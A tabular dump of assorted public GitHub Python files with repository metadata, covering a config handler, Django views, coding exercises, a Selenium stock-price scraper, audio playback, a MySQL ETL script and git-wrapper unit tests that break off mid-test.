blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2 values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220 values | src_encoding stringclasses 30 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 2 10.3M | extension stringclasses 257 values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
510dd57a125e1dab59c4eb0b49f8871bd744a6a2 | f8e1329747ca908ff8c13245fb6be44a0a4577a3 | /DataCollector/configHandler.py | a337a608cb3a8b716459f89cbf4b6f11e40d5dbc | [] | no_license | FlucTuAteDev/EuProNet-Database | 058ba7a19e7cca487e826787ca4241c9b262bed7 | ba72421dbd8832f7c20761ff74cf240f49b350a4 | refs/heads/master | 2021-02-07T00:12:28.653012 | 2020-10-15T16:09:17 | 2020-10-15T16:09:17 | 243,960,243 | 1 | 1 | null | 2020-10-15T16:09:18 | 2020-02-29T11:56:27 | Python | UTF-8 | Python | false | false | 3,236 | py | # region - Imports
import re
from collections import namedtuple
# endregion
# region - Classes
class configHandler:
# region - Dunder methods
"""
Config settings: dict(configName : (regex, requestMessage))
Filepath: The path of the configuration file
"""
def __init__(self, configSettings: dict, filepath: str = "config.cfg", keyValueSeparator: str = "="):
configSet = namedtuple("configSet", "regex requestMessage")
self.filepath = filepath
self.keyValueSeparator = keyValueSeparator
# Convert the tuples to namedtuples for easy and readable access
try:
self.configSettings = {}
for key, value in configSettings.items():
self.configSettings[key] = configSet(*value)
except:
raise Exception("Invalid configuration settings given")
self.cfg = {}
"""
def __iter__(self):
return iter(self.cfg)
def __next__(self):
return next(self.cfg)
def items(self):
return self.cfg.items()
def get(self, key: str, default = None):
return self.cfg.get(key, default)
"""
# endregion
# region - Methods
# Requests the user to set all the configuration values properly if not given
def setUserConfigs(self):
# Set all the config values to None
# If cfg[key] remains None then request that from the user
for key in self.configSettings.keys():
self.cfg[key] = None
# Read correct data into the cfg storage
try:
with open(self.filepath, "r") as f:
# [[key, value], [key, value], ...]
configs = [line.split(self.keyValueSeparator, 1) for line in f.readlines()]
# Checks the key and the value against configuration requirements
for config in configs:
try:
key, value = (x.strip() for x in config)
if re.match(self.configSettings[key].regex , value):
self.cfg[key] = value
except:
# If fails then something is not in the right format so leave the config value None
pass
except:
# If the file open fails then every config value should remain None
pass
for key, value in self.cfg.items():
# If the value is not set get it from the user
if value is None:
while not re.match(self.configSettings[key].regex, "" if value == None else value):
value = input(self.configSettings[key].requestMessage)
self.cfg[key] = value
# Rewrite the config file with the correct values in the configuration object
with open(self.filepath, "w") as f:
for key, value in self.cfg.items():
f.write(f"{key}{self.keyValueSeparator}{value}\n")
# Set attributes for easy access (like cfg.monitoredFolder)
for key, value in self.cfg.items():
try:
setattr(self, key, float(value))
except:
setattr(self, key, value)
# endregion
# endregion
| [
"gucziadamlaszlo@gmail.com"
] | gucziadamlaszlo@gmail.com |
eb599ad48afd47de67a5a38758872173421836a2 | f2a0c0cad8ccc82ac00c7fa9dbf06c5fec96089c | /Student_Management/main/urls.py | b6fe5fc9e31bae12859e560cff9d8544ad9433a3 | [] | no_license | tushargoyal22/Django-Learning | 49bb0c97f6e344dae053a3c913a74c765a9a021b | eb87ac56220d7f0e1e4741cda754547180835713 | refs/heads/master | 2020-12-26T18:12:07.305533 | 2020-04-20T06:22:14 | 2020-04-20T06:22:14 | 237,585,513 | 0 | 0 | null | 2020-06-06T09:08:09 | 2020-02-01T08:31:48 | CSS | UTF-8 | Python | false | false | 497 | py | from django.urls import path
from main import views
urlpatterns = [
path('',views.Index.as_view()),
path('college/<int:pk>' , views.CollegeDetail.as_view(),name='college'),
path('colleges/',views.CollegeList.as_view()),
path('create_college/' , views.CollegeCreate.as_view()),
path('update_college/<int:pk>' , views.CollegeUpdate.as_view()),
path('create_student/' , views.StudentCreate.as_view()),
path('delete_student/<int:pk>' , views.StudentDelete.as_view())
]
| [
"tushar22.tg.tg@gmail.com"
] | tushar22.tg.tg@gmail.com |
e32885af94380c637c2e329002e6eddadc8fcf74 | fb391ea6a3f72f3007b2dc10ed7cd746b2d59642 | /lesson7/exp2.py | a1062041858fa117dbee3789381380959fd5fd6b | [] | no_license | KremenenkoAlex/Python | 6946cec411b6a0c114a17cd1061168f992cde7b2 | f7b4d7f6283b5ff524068cddac3c2872359a17ab | refs/heads/main | 2023-03-02T12:07:11.589231 | 2021-01-30T14:08:48 | 2021-01-30T14:08:48 | 322,815,827 | 0 | 0 | null | 2020-12-26T10:12:02 | 2020-12-19T09:56:38 | null | UTF-8 | Python | false | false | 843 | py | from abc import ABC, abstractmethod
class Clothes(ABC):
def __init__(self, param):
self.param = param
@abstractmethod
def necessary(self):
pass
class Coat(Clothes):
def necessary(self):
return "Сумма затраченной ткани на пальто равна: {:.2f}".format(self.param / 6.5 + 0.5)
class Suit(Clothes):
def necessary(self):
return "Сумма затраченной ткани на костюм равна: {:.2f}".format(2 * self.param + 0.3)
class Full(Clothes):
@property
def necessary(self):
return "Сумма затраченной ткани равна: {:.2f}".format(self.param / 6.5 + 0.5 + 2 * self.param + 0.3)
coat = Coat(100)
suit = Suit(100)
full = Full(100)
print(coat.necessary())
print(suit.necessary())
print(full.necessary) | [
"kremenenko2008@mail.ru"
] | kremenenko2008@mail.ru |
941112e2fd1cd212d7d406d0bbaa7e2bae415bc3 | 217a6c88943e75c79929b69657179f59cd6969c4 | /Auth/serializers/user_my_languages.py | ff166117be4a8a0ccb4a6175ad4c35cd0841fe6c | [] | no_license | manish86510/testapi | 15109428ffb91f434368cb810dfeb790aa45d1d6 | e2cc0f5cb2369e7ad5392773942d642a01bb9f80 | refs/heads/master | 2022-12-11T03:03:57.132046 | 2020-02-25T16:55:23 | 2020-02-25T16:55:23 | 243,049,848 | 0 | 0 | null | 2022-12-08T07:12:56 | 2020-02-25T16:51:39 | Python | UTF-8 | Python | false | false | 466 | py | from rest_framework import serializers
from Auth.models import MyLanguage
class MyLanguageSerializer(serializers.ModelSerializer):
class Meta:
model = MyLanguage
fields = ["id", "name", "read", "write", "speak", 'user']
# fields = "__all__"
class MyLanguageCreateSerializer(serializers.ModelSerializer):
class Meta:
model = MyLanguage
fields = ["id", "name", "read", "write", "speak"]
# fields = "__all__"
| [
"ishu.k@skysoft.net.in"
] | ishu.k@skysoft.net.in |
0c537ff811c0d6ba4bad2d771c8537a196c9043a | db9e654cba94034797a49897bc8185168ed13838 | /Week4/7-Count-of-All-Pairs-With-Zero-Sum/pairs.py | 04bb43e586bbcf29548121c513f32da0dcc0752e | [] | no_license | smonov/HomeWork | f0a65f3edcd436b25103a14bcd9b8a291cdc1f58 | 53053ba11fa2cdad2c27d167847f688ef1fd59ba | refs/heads/master | 2021-03-12T22:08:31.464281 | 2015-09-30T16:13:57 | 2015-09-30T16:13:57 | 31,278,087 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 953 | py | #Week4 Task7 count_of_all_pairs_wit_zer_sum
def count_zero_neighbours(numbers):
count = 0
index = 0
for number in numbers:
if index < len(numbers) - 1:
neighbour = numbers[index + 1]
if number + neighbour == 0:
count += 1
index += 1
return count
def count_zero_pairs(numbers):
count = 0
n = len(numbers)
for x_index in range(0, n):
for y_index in range(x_index, n):
x = numbers[x_index]
y = numbers[y_index]
if x + y == 0:
count += 1
return count
def is_prime(n):
start = 2
is_prime = True
while start < n:
if n % start == 0:
is_prime = False
break
start += 1
return is_prime
def prime_pair(numbers):
for x in numbers:
for y in numbers:
if is_prime(x + y):
return True
return False
| [
"smonov@abv.bg"
] | smonov@abv.bg |
e187641d7db47cec739bd694e61860ff1f2d4b26 | a48eaa4419b87c011abdee1eebfd04b469f4417b | /.history/ghostpost/views_20200211120737.py | 0c516f78e19399fa4ac83bde5fc952b2f89adef3 | [] | no_license | Imraj423/ghostpost | 6418d6c9561528ac8c31dd70d8aae7fac4c77cca | 4edc559eb1f9ef0d11aae78e2b1dbd5c4903ddb5 | refs/heads/master | 2021-01-02T13:32:58.032239 | 2020-02-11T23:21:31 | 2020-02-11T23:21:31 | 239,644,968 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,858 | py |
from django.shortcuts import render
from django.contrib.auth.models import User
from ghostpost.models import ghostPost
from django.shortcuts import render, reverse, HttpResponseRedirect
from ghostpost.forms import addPost
def index(request):
item = ghostPost.objects.all()
return render(request, 'index.html', {'data': item})
def detail(request):
item = ghostPost.objects.all()
return render(request, 'detail.html', {'data': item})
def post_add(request):
html = 'addpost.html'
if request.method == 'POST':
form = addPost(request.POST)
if form.is_valid():
data = form.cleaned_data
ghostPost.objects.create(
message=data['message'],
is_Boast=data['is_Boast']
)
return HttpResponseRedirect(reverse("index"))
form = addPost()
return render(request, html, {'form': form})
def like(request, id):
post = ghostPost.objects.get(id=id)
post.like += 1
post.save()
return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
def dislike(request, id):
post = ghostPost.objects.get(id=id)
post.like -= 1
post.save()
return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
def sorted(request):
html = "index.html"
data = ghostPost.objects.all().order_by(
"-like")
return render(request, html, {"data": data})
def sortedt(request):
html = "index.html"
data = ghostPost.objects.all().order_by("-time")
return render(request, html, {"data": data})
def sortedb(request):
html = "index.html"
data = ghostPost.objects.all().order_by("-is_Boast")
return render(request, html, {"data": data})
def sortedb(request):
html = "index.html"
data = ghostPost.objects.all().order_by("-is_Boast=False")
return render(request, html, {"data": data})
| [
"dahqniss@gmail.com"
] | dahqniss@gmail.com |
7f397abd25523532057ca09c4d0096c9bb8e847f | 7e1ea98a04ac3d5c6cee48d42ca08a41b2c0f397 | /books_app.py | e7817daf580717ae38aaedcdf5c44f291564b2ce | [
"MIT"
] | permissive | mihalw28/library_books | ec15a09db036e9b1215115b618a225f635d40a28 | bdb82341e65fc8a3f91f7b111f63ab343a62427b | refs/heads/master | 2022-12-14T01:30:01.651421 | 2019-10-01T09:23:31 | 2019-10-01T09:23:31 | 186,705,758 | 1 | 0 | MIT | 2022-12-08T05:07:50 | 2019-05-14T21:51:52 | Python | UTF-8 | Python | false | false | 226 | py | from app import app as application, db
from app.models import Author, Book, Category
@application.shell_context_processor
def make_shell_context():
return {"db": db, "Author": Author, "Book": Book, "Category": Category}
| [
"michal.waszak@yahoo.com"
] | michal.waszak@yahoo.com |
8de0fb64fa57bd58c266f1d3d2226bb6c203a8e1 | c0d1de2e61fc66ec51a670eaa8bd731e993292d2 | /FCST/Read_Data.py | 7743f09432162d5c3e851d53dc62e31388192408 | [
"MIT"
] | permissive | WillhelmKai/PyPortfolioOpt | 204d9e2fb176b4e8bd3947e881a6860309b0f524 | 6a040416520aaee4035528b0f2b4d6cdb3abc15f | refs/heads/master | 2021-01-07T03:42:45.077964 | 2020-04-20T02:46:26 | 2020-04-20T02:46:26 | 241,569,327 | 2 | 0 | null | 2020-02-19T08:24:54 | 2020-02-19T08:24:54 | null | UTF-8 | Python | false | false | 1,655 | py | #coding by Willhelm
import requests
import time
import pandas as pd
from sklearn import preprocessing
#sample query
#https://query1.finance.yahoo.com/v7/finance/download/0288.HK?period1=1546300800&period2=1577750400&interval=1d&events=history&crumb=UuO4UZuUbll
class market_Dataset(object):
def __init__(self, path):
'''
Instance variables:
Public methods:
'''
self.data_path = path
def read(self,package_length):
df = pd.read_csv(self.data_path, parse_dates=True, index_col="Date")
# df = df.pct_change().dropna()
#select adj_cloase, volume normalize
df = df[['Adj Close','Volume']]
scaler = preprocessing.StandardScaler().fit(df)
mean, stdv = scaler.mean_, scaler.scale_
df = scaler.transform(df)
#devide three sets
length = len(df)
df_train, df_validation, df_testing = df[:int(length*0.6)],df[int(length*0.6)+1:int(length*0.8)],df[int(length*0.8)+1:]
train, validation, testing = [],[],[]
for i in range(0,len(df_train)-package_length-1):
train+=[{"Input":df_train[i:i+package_length],"Target":df_train[i+package_length:i+package_length+1]}]
for i in range(0,len(df_validation)-package_length-1):
validation = [{"Input":df_validation[i:i+package_length],"Target":df_validation[i+package_length:i+package_length+1]}]
for i in range(0,len(df_testing)-package_length-1):
testing = [{"Input":df_testing[i:i+package_length],"Target":df_testing[i+package_length:i+package_length+1]}]
# print(train)
# print(" ")
# print(df_testing.head())
return train | [
"Willhelmkai@outlook.com"
] | Willhelmkai@outlook.com |
133c3b16ba1adaf5b0f71f1cf995a1cec6f217f7 | a35632bd878ad4e7e0c1c72e0232c7d6a2866cc8 | /preprocessing.py | 1bcabea24b26f917cdc431426ca1fc45a3798033 | [] | no_license | leowe/jgwiki | bc5a000f5e8b0007b610fdb78406ffa7436823b7 | 571249021483f160b77eeb3f5473a8392fef2168 | refs/heads/master | 2021-01-19T05:01:51.725127 | 2016-08-03T17:20:22 | 2016-08-03T17:20:22 | 64,864,123 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,066 | py | import re
from nltk.corpus import stopwords
from nltk.tokenize import wordpunct_tokenize, regexp_tokenize
from nltk.stem.snowball import SnowballStemmer
from collections import defaultdict
stop_words = set(stopwords.words('german'))
#stop_words.update(['.', ',', '"', "'", '?', '!', ':', ';', '(', ')', '[', ']', '{', '}', '=', '-', '|', ])
stop_word_pattern = re.compile(r'''([,\.\?!"'\-+\*\(\)\{\}=:;\[\]|/#]+)''')
stemmer = SnowballStemmer('german', ignore_stopwords=True)
def tokenize_stopword_removal(text, lang='english'):
text = re.sub(stop_word_pattern, '', text)
return [i.lower() for i in wordpunct_tokenize(text) if i.lower() not in stop_words if len(i) > 1]
def tokenize_stem(text):
tokenized = tokenize_stopword_removal(text)
stemmed = [stemmer.stem(word) for word in tokenized]
return stemmed
def count_tokens(tokens):
counter = defaultdict(int)
for token in tokens:
counter[token] += 1
return counter
def max_count_token(token_counts):
return token_counts[max(token_counts, key=token_counts.get)]
| [
"leowndt@gmail.com"
] | leowndt@gmail.com |
697e048e4350aa768d9f762d8bb329c1113d6744 | 1bebf14ef1216332863372c677ff048ab88f5006 | /problem solving/Implementation/Drawing book.py | 9ea8b066f34a39d848b102d9a1c4946df08e82fa | [] | no_license | Zahidsqldba07/hackerrank-codes-in-python | 2c179a91b5afaa63cb38e3aee21cdad67bf84773 | 7e1296d2f3d183b5a4702e83e930f05667ba5677 | refs/heads/master | 2023-03-17T23:21:44.836820 | 2020-06-26T13:00:00 | 2020-06-26T13:00:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 405 | py | #!/bin/python3
import os
import sys
#
# Complete the pageCount function below.
#
def pageCount(n, p):
k=p//2
l=(n//2-p//2)
return (min(k,l))
#
# Write your code here.
#
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
n = int(input())
p = int(input())
result = pageCount(n, p)
fptr.write(str(result) + '\n')
fptr.close()
| [
"50777789+sajal1302@users.noreply.github.com"
] | 50777789+sajal1302@users.noreply.github.com |
652e8748f26f358862132b7fc9300aa65f1f05ec | 3ff9821b1984417a83a75c7d186da9228e13ead9 | /No_0530_Minimum Absolute Difference in BST/minimum_absolute)difference_in_BST_by_inorder_iteration.py | a7418dd3d34f9db81a543e4abdb35916f72c1593 | [
"MIT"
] | permissive | brianchiang-tw/leetcode | fd4df1917daef403c48cb5a3f5834579526ad0c2 | 6978acfb8cb767002cb953d02be68999845425f3 | refs/heads/master | 2023-06-11T00:44:01.423772 | 2023-06-01T03:52:00 | 2023-06-01T03:52:00 | 222,939,709 | 41 | 12 | null | null | null | null | UTF-8 | Python | false | false | 2,094 | py | '''
Description:
Given a binary search tree with non-negative values, find the minimum absolute difference between values of any two nodes.
Example:
Input:
1
\
3
/
2
Output:
1
Explanation:
The minimum absolute difference is 1, which is the difference between 2 and 1 (or between 2 and 3).
Note: There are at least two nodes in this BST.
'''
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def getMinimumDifference(self, root: TreeNode) -> int:
traversal_queue = [(root, 'init')]
min_diff, prev_node_value = float('inf'), -2**31
while traversal_queue:
node, label = traversal_queue.pop()
if label is not 'c':
if node.right:
traversal_queue.append( (node.right, 'r') )
traversal_queue.append( (node, 'c') )
if node.left:
traversal_queue.append( (node.left, 'l') )
else:
min_diff = min(min_diff, node.val - prev_node_value )
prev_node_value = node.val
return min_diff
# n : the number of nodes in binary search tree
## Time Complexity: O( n )
#
# The overhead in time is the cost of in-order traversal, which is of O( n )
## Space Complexity: O( n )
#
# THe overhead in space is the storage for traversal_queue, which is of O( n )
def test_bench():
## Test case_#1
root_1 = TreeNode(1)
root_1.right = TreeNode(3)
root_1.right.left = TreeNode(2)
# expected output:
'''
1
'''
print( Solution().getMinimumDifference(root_1) )
## Test case_#2
root_2 = TreeNode(5)
root_2.left = TreeNode(1)
root_2.right = TreeNode(10)
root_2.right.left = TreeNode(8)
root_2.right.right = TreeNode(13)
# expected output:
'''
2
'''
print( Solution().getMinimumDifference(root_2) )
if __name__ == '__main__':
test_bench() | [
"brianchiang1988@icloud.com"
] | brianchiang1988@icloud.com |
0efc2c824d85ee64bdfdb49c3b5efa82afeaff0b | b4ac05882e479636e19e2759a6e3d7fef1716e99 | /Stocks.py | b5cc476c3161be6d99bcbaa93ff5cbd9cb0b7c81 | [] | no_license | ganesh-8/Stocks_Software | 84e88d6d337499ce31f4ba05097acaabe5930d6f | 1ef9e653ef7cf4371a7fc66784efaf26fe72147f | refs/heads/main | 2023-08-01T23:59:07.363688 | 2021-10-10T11:37:58 | 2021-10-10T11:37:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,617 | py | from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import os
import glob
import pandas as pd
import time
import numpy as np
import xlsxwriter
companyList = ["ABB", "Reliance Industries"]
browser = webdriver.Chrome(r'C:\\Users\\smart\\Downloads\\chromedriver_win32 (1)\\chromedriver.exe')
book = xlsxwriter.Workbook("C:/Users/smart/Desktop/AllStocksList.xlsx")
sheet = book.add_worksheet()
sheet.write(0,0,"CompanyName")
startYear = ['2011', '2012', '2013', '2014', '2015', '2016', '2017', '2018', '2019', '2020']
endYear = ['2012', '2013', '2014', '2015', '2016', '2017', '2018', '2019', '2020', '2021']
for i in range(10):
sheet.write(0,i+1,"FY"+startYear[i]+"-"+endYear[i])
const_var = 1
for companyName in companyList:
browser.get("https://www.bseindia.com/")
searchBar = browser.find_element_by_id("getquotesearch")
searchBar.send_keys(companyName)
browser.implicitly_wait(10)
searchBar.send_keys(Keys.ENTER)
browser.implicitly_wait(50)
archives = browser.find_element_by_xpath('//*[@id="getquoteheader"]/div[6]/div/div[3]/div/div[3]/div[2]/a/input')
archives.send_keys(Keys.ENTER)
browser.find_element_by_xpath('//*[@id="ContentPlaceHolder1_txtFromDate"]').click()
browser.find_element_by_xpath('//*[@id="ui-datepicker-div"]/div/div/select[1]').send_keys("APR")
browser.find_element_by_xpath('//*[@id="ui-datepicker-div"]/div/div/select[2]').send_keys("2011")
browser.find_element_by_xpath('//*[@id="ui-datepicker-div"]/table/tbody/tr[1]/td[6]/a').send_keys("1")
browser.find_element_by_xpath('//*[@id="ui-datepicker-div"]/table/tbody/tr[1]/td[6]/a').click()
browser.implicitly_wait(50)
browser.find_element_by_xpath(
'/html/body/form/div[4]/div/div/div[1]/div/div[3]/div/div/table/tbody/tr[4]/td/table/tbody/tr/td/div/table/tbody/tr[1]/td[3]/input').click()
browser.find_element_by_xpath('/html/body/div/div/div/select[1]').send_keys("MAR")
browser.find_element_by_xpath('/html/body/div/div/div/select[1]').click()
browser.implicitly_wait(10)
browser.find_element_by_xpath('/html/body/div/table/tbody/tr[5]/td[4]/a').send_keys("31")
browser.find_element_by_xpath('/html/body/div/table/tbody/tr[5]/td[4]/a').click()
browser.implicitly_wait(10)
browser.find_element_by_xpath('//*[@id="ContentPlaceHolder1_btnSubmit"]').click()
browser.find_element_by_xpath('//*[@id="ContentPlaceHolder1_btnDownload1"]/i').click()
time.sleep(10)
list_of_files = glob.glob('C:/Users/smart/Downloads/*.csv') # * means all if need specific format then *.csv
latest_file = max(list_of_files, key=os.path.getctime)
print(latest_file)
data = pd.read_csv(latest_file)
avgList = []
df = pd.DataFrame(data, columns=["Date", "Close Price"])
dates = data.loc[:, "Date"]
df['Date'] = pd.to_datetime(df['Date'])
startYear = ['2011', '2012', '2013', '2014', '2015', '2016', '2017', '2018', '2019', '2020']
endYear = ['2012', '2013', '2014', '2015', '2016', '2017', '2018', '2019', '2020', '2021']
closePriceAvgList = []
i = 0
while i < len(startYear):
mask = ((df['Date'] >= startYear[i] + "-04-01") & (df['Date'] <= endYear[i] + "-03-31"))
df1 = df.loc[mask]
closePriceAvg = df1['Close Price'].mean()
closePriceAvgList.append(closePriceAvg)
i += 1
i = 1
for stock in closePriceAvgList:
sheet.write(const_var, 0, companyName)
sheet.write(const_var, i, stock)
i += 1
print(stock)
const_var += 1
print(df.loc[mask])
print(closePriceAvg)
book.close()
| [
"ganesh.sv@surya-soft.com"
] | ganesh.sv@surya-soft.com |
4a7fa456d169a00bddd9c0491088b97441603746 | 4cf94ee34584c3a040f6668167535e5c614b8416 | /url_manager.py | 3a577eb555aaaf181179def5556a248ed21dae00 | [] | no_license | daozl/spider | 44cc1de635cb5646f941dd71e4e0692b7985f191 | a456de9566167d157633ce3d5e01b9625658a41f | refs/heads/master | 2021-04-30T07:45:39.224332 | 2018-02-13T08:19:02 | 2018-02-13T08:19:02 | 121,355,237 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 775 | py | # -*- coding: utf-8 -*-
"""
Created on Fri Feb 09 16:41:19 2018
@author: daozl1
"""
class UrlManager(object):
def __init__(self):
self.new_urls = set()
self.old_urls = set()
def add_new_url(self,url):
if url is None:
return
if url not in self.new_urls and url not in self.old_urls:
self.new_urls.add(url)
def add_new_urls(self,urls):
if urls is None or len(urls) == 0:
return
for url in urls:
self.add_new_url(url)
def has_new_url(self):
return len(self.new_urls) != 0
def get_new_url(self):
new_url = self.new_urls.pop()
self.old_urls.add(new_url)
return new_url | [
"daozl1@lenovo.com"
] | daozl1@lenovo.com |
0aba029a55aec6ad1428eab510053224643a4fb5 | aaa13a9db81f478a1890efc23fe0c03f3736d1a6 | /package_functions/module_audiofunctions.py | 9e5164b83124632233680279a5d684151703f5c6 | [] | no_license | Seleukos/AudioTestCreator | ca295eb02ab4b7b44ae8b855dc09e76767fd4bd0 | cc75c647d0009bfb86d59f649ccf4de9726ddd47 | refs/heads/master | 2020-07-24T22:06:50.821807 | 2019-09-12T13:57:09 | 2019-09-12T13:57:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,615 | py |
import pyaudio
import wave
import sys
def playback_audiofile(filepath):
CHUNK = 1024
#filepath = 'C:\\Users\\Tobi_SurfacePro\\PycharmProjects\\Test_PyAudio\\Jungle Windows Start.wav'
if len(filepath) < 2:
print("Plays a wave file.\n\nUsage: %s filename.wav" % filepath)
sys.exit(-1)
wf = wave.open(filepath, 'rb')
print(wf.getnchannels())
pyaudio.paASIO = 3
# instantiate PyAudio (1)
p = pyaudio.PyAudio()
print(p.get_host_api_info_by_index(0))
print(p.get_default_host_api_info())
# open stream (2)
stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),
channels=wf.getnchannels(),
rate=wf.getframerate(),
output=True)
# read data
data = wf.readframes(CHUNK)
# play stream (3)
while len(data) > 0:
stream.write(data)
data = wf.readframes(CHUNK)
# stop stream (4)
stream.stop_stream()
stream.close()
# close PyAudio (5)
p.terminate()
for x in range(100):
get_soundcard_dev_info()
def get_soundcard_dev_info():
import pyaudio
pad_sc = pyaudio.PyAudio()
max_devs = pad_sc.get_device_count()
input_devices_index = []
output_devices_index = []
for i in range(max_devs):
devinfo = pad_sc.get_device_info_by_index(i)
if "TUSBAudio ASIO Driver" in devinfo['name']:
input_devices_index.append(int(devinfo['index']))
output_devices_index.append(int(devinfo['index']))
if not input_devices_index:
print ("NONE")
print(input_devices_index) | [
"meyer.tobias92_ing@gmx.de"
] | meyer.tobias92_ing@gmx.de |
56355c40281c49161566966d5d2b9a09760553bf | d350ecb50abd047d42e2c38d835d6ea8ccb3b787 | /Final_Products/player_bio_info_etl.py | e61cbb9e52cdf17ff034b27f95e5545a211fcf28 | [] | no_license | cs327e-spring2016/TeamCT | da1b93f2fa8e500cdcb0f959efc8c956e1dbd3b1 | 4c87a25cc642808c12e5690257ffb799723e1490 | refs/heads/master | 2021-01-19T12:10:33.196228 | 2016-05-05T00:38:45 | 2016-05-05T00:38:45 | 54,931,440 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,139 | py | import pymysql
def unique_items(players):
insert_set = []
name_set = set()
for item in players:
if item[0]+" "+item[1] not in name_set:
name_set.add(item[0]+" "+item[1])
insert_set.append(item)
return insert_set
file = open("player_info.txt", "r")
players = []
for line in file:
line = line.split(";")
line[6] = line[6][:-1]
players.append(line)
print(len(players))
players = unique_items(players)
players = sorted(players)
player_id = 1
for player in players:
player.reverse()
player.append(player_id)
player.reverse()
player_id += 1
print(players)
# once player array is cleaned up, add to MySQL database 'TeamCT'
conn = pymysql.connect(host='127.0.0.1', user='root', passwd='xx', db='mysql')
cur = conn.cursor()
cur.execute("USE TeamCT")
for player in players:
cur.execute("INSERT INTO Player_Bio_Info (player_id, lname, fname, position, height, weight, DOB, college) VALUES (%s,%s,%s,%s,%s,%s,%s,%s)", (player[0], player[1], player[2], player[3], player[4], int(player[5]), player[6], player[7]))
cur.connection.commit()
cur.close()
conn.close() | [
"ronlyleung@yahoo.com"
] | ronlyleung@yahoo.com |
ed5011cc3487f985230c6ed6dd624bc9edd28642 | 898a94058b46ad09e55f220772b74ac9b0d7d249 | /test/test_repo.py | 31e8b686902e5e56550fdc2d69622f87131c4840 | [] | no_license | ndreynolds/pygri | 797d6f541884adead582b9a0230ae1057122aef4 | 239c1ceb8414170f925de9a52a31e666df090bd1 | refs/heads/master | 2016-09-06T04:23:13.987047 | 2011-12-01T06:02:12 | 2011-12-01T06:02:12 | 2,840,397 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,602 | py | from __future__ import with_statement
import unittest
import os
import shutil
import inspect
import uuid
from pygri.repo import Repo, \
NoHeadSet, \
NothingToCommit, \
FILE_IS_UNCHANGED, \
FILE_IS_NEW, \
FILE_IS_MODIFIED, \
FILE_IS_DELETED, \
_expand_ref
from dulwich.objects import Commit, Tree, Blob
from dulwich.errors import NotTreeError
class NoHeadSetTest(unittest.TestCase):
"""Tests the `NoHeadSet` class."""
def test(self):
# just make sure it's an exception.
assert Exception in inspect.getmro(NoHeadSet)
class NothingToCommitTest(unittest.TestCase):
"""Tests the `NothingToCommit` class."""
def test(self):
assert Exception in inspect.getmro(NothingToCommit)
class RepoTest(unittest.TestCase):
"""Tests the `Repo` class."""
def setUp(self):
# a path to create each test case's repo at.
self.path = str(uuid.uuid4())
def tearDown(self):
# ``rm -r`` self.path afterwards, if exists.
if os.path.isdir(self.path):
shutil.rmtree(self.path)
def test__file_status(self):
"""Tests the `_file_status` method"""
r = self._repo_with_commits()
basepath = os.path.join(r.root, 'spam-')
# remove the first one
os.remove(basepath + '0')
# edit the second one
with open(basepath + '1', 'w') as fp:
fp.write('something else\n\n')
# new file
with open(basepath + 'x', 'w') as fp:
fp.write('new file')
assert r._file_status('spam-0') == FILE_IS_DELETED
assert r._file_status('spam-1') == FILE_IS_MODIFIED
assert r._file_status('spam-2') == FILE_IS_UNCHANGED
assert r._file_status('spam-x') == FILE_IS_NEW
def test__file_is_modified(self):
"""Tests the `_file_is_modified` method"""
pass
def test__apply_to_tree(self):
"""Tests the `_apply_to_tree` method"""
pass
def test__diff_file(self):
"""Tests the `_diff_file` method"""
pass
def test__file_in_tree(self):
"""Tests the `_file_in_tree` method"""
r = self._repo_with_commits(4)
# the spam-0 file is created by the _repo_with_commits method
assert r._file_in_tree('spam-0')
def test__resolve_ref(self):
"""Tests the `_resolve_ref` method"""
pass
def test__obj_from_tree(self):
"""Tests the `_obj_from_tree` method"""
r = self._repo_with_commits(4)
tree = r.object(r.head().tree)
assert type(r._obj_from_tree(tree, 'spam-0')) is Blob
# TODO: test subtree retrieval
def test__write_tree_to_wt(self):
"""Tests the `_write_tree_to_wt` method"""
pass
def test_add(self):
"""Tests the `add` method"""
# TODO: a lot more tests here.
#
# Need to verify:
# * add path or all
# * add only modified
# * optionally exclude new files
r = self._repo_with_commits()
def in_index(index, path):
for i in index.iteritems():
if i[0] == path:
return True
return False
# create a new file and add it to index
# test add path
self._rand_file('spam-4')
adds = r.add('spam-4')
# only 1 file should have been added.
assert len(adds) == 1
# is it in the index?
if not in_index(r.repo.open_index(), 'spam-4'):
raise KeyError('File not added to index')
# create another file
# test add all
self._rand_file('spam-5')
r.add(all=True)
# is it in the index?
if not in_index(r.repo.open_index(), 'spam-5'):
raise KeyError('File not added to index')
# unmodified's shouldn't be add-able.
adds = r.add('spam-0')
assert len(adds) == 0
# we want to make sure that the files get committed as well.
r.commit(message='test', committer='test')
assert r._file_in_tree('spam-4')
assert r._file_in_tree('spam-5')
def test_branch(self):
"""Tests the `branch` method"""
r = self._repo_with_commits()
# test repo should be on master branch.
assert r.branch() == 'refs/heads/master'
# create new branch (from HEAD)
r.branch('test_branch')
